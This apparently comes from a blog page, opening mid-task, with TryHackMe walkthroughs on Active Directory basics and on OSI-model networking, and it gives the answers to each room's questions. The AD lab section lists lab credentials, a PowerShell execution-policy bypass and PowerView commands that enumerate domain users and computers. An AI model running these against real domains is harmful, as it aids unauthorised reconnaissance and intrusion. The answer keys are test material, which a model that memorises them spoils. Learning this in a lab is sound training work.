    •     Contains the NTDS.dit - a database that contains all of the information of an Active Directory domain controller as well as password hashes for domain users
    •     Stored by default in %SystemRoot%\NTDS
    •     Accessible only by the domain controller



    That is everything that you need to know in terms of physical and on-premise Active Directory. Now move on to learn about the software and infrastructure behind the network.




    #1 What database does the AD DS contain?


    Ans :- NTDS.dit



    #2 Where is the NTDS.dit stored?


    Ans :- %SystemRoot%\NTDS





    #3 What type of machine can be a domain controller?

    Ans :- Windows Server





    [Task 3] The Forest



    The forest is what defines everything; it is the container that holds all of the other bits and pieces of the network together -- without the forest all of the other trees and domains would not be able to interact. The one thing to note when thinking of the forest is to not think of it too literally -- it is a physical thing just as much as it is a figurative thing. When we say "forest", it is only a way of describing the connection created between these trees and domains by the network.



    Active Directory Basics TryHackMe Walkthrough




    Forest Overview -

    A forest is a collection of one or more domain trees inside of an Active Directory network. It is what categorizes the parts of the network as a whole.

    The Forest consists of these parts which we will go into farther detail with later:

    •     Trees - A hierarchy of domains in Active Directory Domain Services
    •     Domains - Used to group and manage objects
    •     Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs
    •     Trusts - Allows users to access resources in other domains
    •     Objects - users, groups, printers, computers, shares
    •     Domain Services - DNS Server, LLMNR, IPv6
    •     Domain Schema - Rules for object creation



    #1 What is the term for a hierarchy of domains in a network?


    Ans :- Trees



    #2 What is the term for the rules for object creation?

    Ans :- Domain Schema



    #3 What is the term for containers for groups, computers, users, printers, and other OUs?


    Ans :- Organizational Units

     

    [Task 4] Users + Groups



    The users and groups that are inside of an Active Directory are up to you; when you create a domain controller it comes with default groups and two default users: Administrator and guest. It is up to you to create new users and create new groups to add users to.







    Users Overview -


    Users are the core to Active Directory; without users why have Active Directory in the first place? There are four main types of users you'll find in an Active Directory network; however, there can be more depending on how a company manages the permissions of its users. The four types of users are: 


    •     Domain Admins - This is the big boss: they control the domains and are the only ones with access to the domain controller.
    •     Service Accounts (Can be Domain Admins) - These are for the most part never used except for service maintenance, they are required by Windows for services such as SQL to pair a service with a service account
    •     Local Administrators - These users can make changes to local machines as an administrator and may even be able to control other normal users, but they cannot access the domain controller
    •     Domain Users - These are your everyday users. They can log in on the machines they have the authorization to access and may have local administrator rights to machines depending on the organization.





    Groups Overview -

    Groups make it easier to give permissions to users and objects by organizing them into groups with specified permissions. There are two overarching types of Active Directory groups:

    •     Security Groups - These groups are used to specify permissions for a large number of users
    •     Distribution Groups - These groups are used to specify email distribution lists. As an attacker these groups are less beneficial to us but can still be beneficial in enumeration



     
    Default Security Groups -

    There are a lot of default security groups so I won't be going into too much detail of each past a brief description of the permissions that they offer to the assigned group. Here is a brief outline of the security groups:


    •     Domain Controllers - All domain controllers in the domain
    •     Domain Guests - All domain guests
    •     Domain Users - All domain users
    •     Domain Computers - All workstations and servers joined to the domain
    •     Domain Admins - Designated administrators of the domain
    •     Enterprise Admins - Designated administrators of the enterprise
    •     Schema Admins - Designated administrators of the schema
    •     DNS Admins - DNS Administrators Group
    •     DNS Update Proxy - DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).
    •     Allowed RODC Password Replication Group - Members in this group can have their passwords replicated to all read-only domain controllers in the domain
    •     Group Policy Creator Owners - Members in this group can modify group policy for the domain
    •     Denied RODC Password Replication Group - Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain
    •     Protected Users - Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.
    •     Cert Publishers - Members of this group are permitted to publish certificates to the directory
    •     Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the domain
    •     Enterprise Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the enterprise
    •     Key Admins - Members of this group can perform administrative actions on key objects within the domain.
    •     Enterprise Key Admins - Members of this group can perform administrative actions on key objects within the forest.
    •     Cloneable Domain Controllers - Members of this group that are domain controllers may be cloned.
    •     RAS and IAS Servers - Servers in this group can access remote access properties of users


    #1 Which type of groups specify user permissions?

    Ans :- Security Groups



    #2 Which group contains all workstations and servers joined to the domain?

    Ans :- Domain Computers



    #3 Which group can publish certificates to the directory?


     Ans :- Cert publishers




    #4 Which user can make changes to a local machine but not to a domain controller?

    Ans :- Local Administrators




    #5 Which group has their passwords replicated to read-only domain controllers?


    Ans :- Allowed RODC Password Replication Group



     



     

    [Task 5] Trusts + Policies




    Trusts and policies go hand in hand to help the domain and trees communicate with each other and maintain "security" inside of the network. They put the rules in place of how the domains inside of a forest can interact with each other, how an external forest can interact with the forest, and the overall domain rules or policies that a domain must follow.



    Domain Trusts Overview -


    Trusts are a mechanism in place for users in the network to gain access to other resources in the domain. For the most part, trusts outline the way that the domains inside of a forest communicate to each other, in some environments trusts can be extended out to external domains and even forests in some cases.




    There are two types of trusts that determine how the domains communicate. I'll outline the two types of trusts below:

    •     Directional - The direction of the trust flows from a trusting domain to a trusted domain
    •     Transitive - The trust relationship expands beyond just two domains to include other trusted domains


    The type of trusts put in place determines how the domains and trees in a forest are able to communicate and send data to and from each other. When attacking an Active Directory environment, you can sometimes abuse these trusts in order to move laterally throughout the network.



    Domain Policies Overview -



    Policies are a very big part of Active Directory; they dictate how the server operates and what rules it will and will not follow. You can think of domain policies like domain groups, except instead of permissions they contain rules, and instead of only applying to a group of users, the policies apply to a domain as a whole. They simply act as a rulebook for Active Directory that a domain admin can modify and alter as they deem necessary to keep the network running smoothly and securely. Along with the very long list of default domain policies, domain admins can choose to add in their own policies not already on the domain controller; for example, if you wanted to disable Windows Defender across all machines on the domain, you could create a new group policy object to do so. The options for domain policies are almost endless and are a big factor for attackers when enumerating an Active Directory network. I'll outline just a few of the many policies that are default or that you can create in an Active Directory environment:



    •     Disable Windows Defender - Disables Windows Defender across all machines on the domain
    •     Digitally Sign Communication (Always) - Can disable or enable SMB signing on the domain controller




    #1 What type of trust flows from a trusting domain to a trusted domain?

    Ans :- Directional




    #2 What type of trusts expands to include other trusted domains?

    Ans :- Transitive


    [Task 6] Active Directory Domain Services + Authentication




    The Active Directory domain services are the core functions of an Active Directory network; they allow for management of the domain, security certificates, LDAPs, and much more. This is how the domain controller decides what it wants to do and what services it wants to provide for the domain.





    Domain Services Overview -


    Domain Services are exactly what they sound like. They are services that the domain controller provides to the rest of the domain or tree. There is a wide range of various services that can be added to a domain controller; however, in this room we'll only be going over the default services that come when you set up a Windows server as a domain controller. Outlined below are the default domain services:


    •     LDAP - Lightweight Directory Access Protocol; provides communication between applications and directory services
    •     Certificate Services - allows the domain controller to create, validate, and revoke public key certificates
    •     DNS, LLMNR, NBT-NS - name resolution services used to resolve hostnames to IP addresses
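
    To give a feel for what the LDAP service actually does, here is a minimal sketch of querying it straight from PowerShell using the built-in ADSI searcher (this assumes you run it on a domain-joined machine, such as the lab box later in this post):

    $searcher = [adsisearcher]'(&(objectCategory=person)(objectClass=user))'   # LDAP filter for user objects
    $searcher.FindAll() | ForEach-Object { $_.Properties['samaccountname'] }   # print each user's logon name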



    Domain Authentication Overview -



    The most important part of Active Directory -- as well as the most vulnerable part of Active Directory -- is the authentication protocols it has in place. There are two main types of authentication in Active Directory: NTLM and Kerberos. Since these will be covered in more depth in later rooms, we will only cover the basics needed to understand how they apply to Active Directory as a whole.



    •     Kerberos - the default authentication service for Active Directory; uses ticket-granting tickets and service tickets to authenticate users and give them access to resources across the domain
    •     NTLM - the default Windows authentication protocol; uses an encrypted challenge/response exchange
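
    If you want to see Kerberos in action on a Windows machine, the built-in klist command shows the ticket-granting ticket and any service tickets cached for your current logon session:

    klist - lists the Kerberos tickets held by the current logon session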


    The Active Directory domain services are the main access point for attackers and contain some of the most vulnerable protocols in Active Directory; this will not be the last time you see them mentioned in terms of Active Directory security.





    #1 What type of authentication uses tickets?

    Ans :- Kerberos


    #2 What domain service can create, validate, and revoke public key certificates?


    Ans :- Certificate Services



    [Task 7] AD in the Cloud



    Recently there has been a shift towards companies moving their Active Directory environments to cloud networks. The most notable AD cloud provider is Azure AD. Its default settings are much more secure than an on-premise physical Active Directory network; however, cloud AD may still have vulnerabilities of its own.





    Azure AD Overview -


    Azure acts as the middle man between your physical Active Directory and your users' sign on. This allows for a more secure transaction between domains, making a lot of Active Directory attacks ineffective.




    Cloud Security Overview -


    The best way to show how the cloud goes beyond the security precautions already provided by a physical network is a side-by-side comparison between Windows Server AD and a cloud Active Directory environment:


    Windows Server AD          Azure AD
    LDAP                       Rest APIs
    NTLM                       OAuth/SAML
    Kerberos                   OpenID
    OU Tree                    Flat Structure
    Domains and Forests        Tenants
    Trusts                     Guests




    This is only an overview of Active Directory in the cloud, so we will not be going into detail on any of these protocols; however, I encourage you to go and do your own research into these cloud protocols, how they are more secure than their physical counterparts, and whether they come with vulnerabilities of their own.
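
    If you want to poke at Azure AD from PowerShell, a commonly used starting point is the AzureAD module. A hedged sketch, assuming the module is installed and you have a tenant you are allowed to sign in to:

    Install-Module AzureAD - installs the AzureAD PowerShell module (one-time setup)
    Connect-AzureAD - interactive sign-in to the tenant
    Get-AzureADUser -Top 10 - lists the first ten users in the tenant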






    #1 What is the Azure AD equivalent of LDAP?


    Ans :- Rest APIs



    #2 What is the Azure AD equivalent of Domains and Forests?

    Ans :- Tenants




    #3 What is the Windows Server AD equivalent of Guests?


    Ans :- Trusts

     

    [Task 8] Hands-On Lab



    Lab Setup - 


    1.) Deploy the Machine

    2.) SSH or RDP into the machine


    user: Administrator

    pass: P@$$W0rd



    domain: CONTROLLER.local


    PowerView Setup -

    1.) cd Downloads - navigate to the directory PowerView is in

    2.) powershell -ep bypass - load a powershell shell with execution policy bypassed

    3.) . .\PowerView.ps1 - import the PowerView module






    Lab Overview -


    I will help you with a few commands; the rest is up to you. Use the cheatsheet linked here to find what you need. You should have enough knowledge of Active Directory now to investigate the machine's internals on your own.



    Example Commands:


    Get-NetComputer -fulldata | select operatingsystem - gets a list of all operating systems on the domain








    Get-NetUser | select cn - gets a list of all users on the domain
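
    A couple more examples in the same spirit, which should point you towards the remaining questions (exact parameter names can vary slightly between PowerView versions):

    Get-NetGroup - gets a list of all groups on the domain
    Get-NetUser -UserName SQLService | select pwdlastset - shows when a specific user's password was last set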








    #2 What is the name of the windows 10 operating system?


    Ans :- Windows 10 Enterprise Evaluation




    #3 What is the second "Admin" name?


    Ans :- Admin2






    #4 Which group has a capital "V" in the group name?


    Ans :- Hyper-V Administrators




    #5 When was the password last set for the SQLService user?


    Ans :- 5/13/2020  8:26:58 PM







    Video Tutorial :-

    Disclaimer


    This was written for educational purposes and pentesting only.
    The author will not be responsible for any damage!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal!


    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about Ethical Hacking, Security, Penetration Testing and malware analysis. These hacking tutorials are against misuse of the information, and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources; they do not contain any illegal activity. We do not promote, encourage, support or incite any illegal activity or hacking without written permission. We want to raise security awareness and inform our readers on how to avoid becoming a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post; if you did, please don't forget to share it.
    Thank you so much :-)




  • Introductory Networking : Encapsulation





    As the data is passed down each layer of the model, more information containing details specific to the layer in question is added on to the start of the transmission. As an example, the header added by the Network Layer would include things like the source and destination IP addresses, and the header added by the Transport Layer would include (amongst other things) information specific to the protocol being used. The Data Link layer also adds a piece on at the end of the transmission, which is used to verify that the data has not been corrupted on transmission; this also has the added bonus of increased security, as the data can't be intercepted and tampered with without breaking the trailer. This whole process is referred to as encapsulation: the process by which data can be sent from one computer to another.








    Notice that the encapsulated data is given a different name at different steps of the process. In layers 7, 6 and 5, the data is simply referred to as data. In the Transport layer the encapsulated data is referred to as a segment or a datagram (depending on whether TCP or UDP has been selected as the transmission protocol). At the Network layer, the data is referred to as a packet. When the packet gets passed down to the Data Link layer it becomes a frame, and by the time it's transmitted across a network the frame has been broken down into bits.
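
    Purely as an illustration (this is a toy sketch in PowerShell, not a real network stack), you can picture each layer tacking its own header onto whatever it received from the layer above, plus a trailer at the Data Link layer:

    $data    = 'GET / HTTP/1.1'                      # layers 7-5: just 'data'
    $segment = 'TCP-HEADER|' + $data                 # layer 4: a segment (or a datagram for UDP)
    $packet  = 'IP-HEADER|' + $segment               # layer 3: a packet
    $frame   = 'MAC-HEADER|' + $packet + '|TRAILER'  # layer 2: a frame, header plus trailer
    $frame                                           # layer 1 would transmit this as bits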






    When the message is received by the second computer, it reverses the process -- starting at the physical layer and working up until it reaches the application layer, stripping off the added information as it goes. This is referred to as de-encapsulation. As such you can think of the layers of the OSI model as existing inside every computer with network capabilities. Whilst it's not actually as clear cut in practice, computers all follow the same process of encapsulation to send data and de-encapsulation upon receiving it.



    The processes of encapsulation and de-encapsulation are very important -- not least because of their practical use, but also because they give us a standardised method for sending data. This means that all transmissions will consistently follow the same methodology, allowing any network enabled device to send a request to any other reachable device and be sure that it will be understood -- regardless of whether they are from the same manufacturer; use the same operating system; or any other factors.




    See Also :- 


    The OSI Model: An Overview :- Click Here





    #1 How would you refer to data at layer 2 of the encapsulation process (with the OSI model)?


    Answer :- Frames



    #2 How would you refer to data at layer 4 of the encapsulation process (with the OSI model), if the UDP protocol has been selected?


    Answer :- Datagram



    #3 What process would a computer perform on a received message?


    Answer :- De-Encapsulation




    #4 Which is the only layer of the OSI model to add a trailer during encapsulation?




    Answer :- Data Link



    #5 Does encapsulation provide an extra layer of security (Aye/Nay)?


    Answer :- Aye




    I hope you liked this post; if you did, please don't forget to share it.
    Thank you so much :-)



  • The OSI Model: An Overview



    The OSI Model: An Overview




    The OSI (Open Systems Interconnection) Model is a standardised model which we use to demonstrate the theory behind computer networking. In practice, it's actually the more compact TCP/IP model that real-world networking is based on; however, the OSI model, in many ways, is easier to get an initial understanding from.



    The OSI model consists of seven layers:




    Layer 7 -- Application
    Layer 6 -- Presentation
    Layer 5 -- Session
    Layer 4 -- Transport
    Layer 3 -- Network
    Layer 2 -- Data Link
    Layer 1 -- Physical







    There are many mnemonics floating around to help you learn the layers of the OSI model -- search around until you find one that you like.


    I personally favour: Anxious Pale Shakespeare Treated Nervous Drunks Patiently


    Let's briefly take a look at each of these in turn:





    Layer 7 -- Application:



    The application layer of the OSI model essentially provides networking options to programs running on a computer. It works almost exclusively with applications, providing an interface for them to use in order to transmit data. When data is given to the application layer, it is passed down into the presentation layer.





    Layer 6 -- Presentation:



    The presentation layer receives data from the application layer. This data tends to be in a format that the application understands, but it's not necessarily in a standardised format that could be understood by the application layer in the receiving computer. The presentation layer translates the data into a standardised format, as well as handling any encryption, compression or other transformations to the data. With this complete, the data is passed down to the session layer.







    Layer 5 -- Session:



    When the session layer receives the correctly formatted data from the presentation layer, it looks to see if it can set up a connection with the other computer across the network. If it can't then it sends back an error and the process goes no further. If a session can be established then it's the job of the session layer to maintain it, as well as co-operate with the session layer of the remote computer in order to synchronise communications. The session layer is particularly important as the session that it creates is unique to the communication in question. This is what allows you to make multiple requests to different endpoints simultaneously without all the data getting mixed up (think about opening two tabs in a web browser at the same time)! When the session layer has successfully logged a connection between the host and remote computer the data is passed down to Layer 4: the transport Layer.





    Layer 4 -- Transport:


    The transport layer is a very interesting layer that serves numerous important functions. Its first purpose is to choose the protocol over which the data is to be transmitted. The two most common protocols in the transport layer are TCP (Transmission Control Protocol) and UDP (User Datagram Protocol); with TCP the transmission is connection-based which means that a connection between the computers is established and maintained for the duration of the request. This allows for a reliable transmission, as the connection can be used to ensure that the packets all get to the right place. A TCP connection allows the two computers to remain in constant communication to ensure that the data is sent at an acceptable speed, and that any lost data is re-sent. With UDP, the opposite is true; packets of data are essentially thrown at the receiving computer -- if it can't keep up then that's its problem (this is why a video transmission over something like Skype can be pixelated if the connection is bad). What this means is that TCP would usually be chosen for situations where accuracy is favoured over speed (e.g. file transfer, or loading a webpage), and UDP would be used in situations where speed is more important (e.g. video streaming).


    With a protocol selected, the transport layer then divides the transmission up into bite-sized pieces (over TCP these are called segments, over UDP they're called datagrams), which makes it easier to transmit the message successfully.
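
    A quick way to see connection-based (TCP) transport in action is Test-NetConnection, which ships with modern Windows and performs a full TCP handshake against a port (the hostname below is just an example):

    Test-NetConnection -ComputerName tryhackme.com -Port 443 - attempts a TCP connection to port 443 and reports whether it succeeded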




    Layer 3 -- Network:


    The network layer is responsible for locating the destination of your request. For example, the Internet is a huge network; when you want to request information from a webpage, it's the network layer that takes the IP address for the page and figures out the best route to take. At this stage we're working with what is referred to as logical addressing (i.e. IP addresses), which is still software controlled. Logical addresses are used to provide order to networks, categorising them and allowing us to properly sort them. Currently the most common form of logical addressing is the IPv4 format, which you'll likely already be familiar with (e.g. 192.168.1.1 is a common address for a home router).
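
    You can watch the network layer's routing decisions for yourself with the built-in tracert tool, which lists each hop a packet takes on the way to a destination IP (the address below is just an example):

    tracert 8.8.8.8 - traces the route taken to reach the destination address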





    Layer 2 -- Data Link:


    The data link layer focuses on the physical addressing of the transmission. It receives a packet from the network layer (that includes the IP address for the remote computer) and adds in the physical (MAC) address of the receiving endpoint. Inside every network enabled computer is a Network Interface Card (NIC) which comes with a unique MAC (Media Access Control) address to identify it.


    MAC addresses are set by the manufacturer and literally burnt into the card; they can't be changed -- although they can be spoofed. When information is sent across a network, it's actually the physical address that is used to identify where exactly to send the information.
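
    On a Windows machine you can list the MAC addresses of your own network cards with the built-in NetAdapter cmdlets:

    Get-NetAdapter | select Name, MacAddress - shows each local network interface and its burned-in MAC address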


    Additionally, it's also the job of the data link layer to present the data in a format suitable for transmission.


    The data link layer also serves an important function when it receives data, as it checks the received information to make sure that it hasn't been corrupted during transmission, which could well happen when the data is transmitted by layer 1: the physical layer.





    Layer 1 -- Physical:



    The physical layer is right down to the hardware of the computer. This is where the electrical pulses that make up data transfer over a network are sent and received. It's the job of the physical layer to convert the binary data of the transmission into signals and transmit them across the network, as well as receiving incoming signals and converting them back into binary data.










    For the "Which Layer" Questions below, answer using the layer number (1-7):




    #1 Which layer would choose to send data over TCP or UDP?


    Answer :- 4




    #2 Which layer checks received packets to make sure that they haven't been corrupted?


    Answer :- 2



    #3 In which layer would data be formatted in preparation for transmission?


    Answer :- 2



    #4 Which layer transmits and receives data?


    Answer :- 1



    #5 Which layer encrypts, compresses, or otherwise transforms the initial data to give it a standardised format?


    Answer :- 6



    #6 Which layer tracks communications between the host and receiving computers?


    Answer :- 5



    #7 Which layer accepts communication requests from applications?


    Answer :- 7



    #8 Which layer handles logical addressing?


    Answer :- 3





    #9 When sending data over TCP, what would you call the "bite-sized" pieces of data?


    Answer :- segment



    #10 [Research] Which layer would the FTP protocol communicate with?


    Answer :- 7



    #11 Which transport layer protocol would be best suited to transmit a live video?


    Answer :- UDP





    I hope you liked this post; if you did, please don't forget to share it.
    Thank you so much :-)


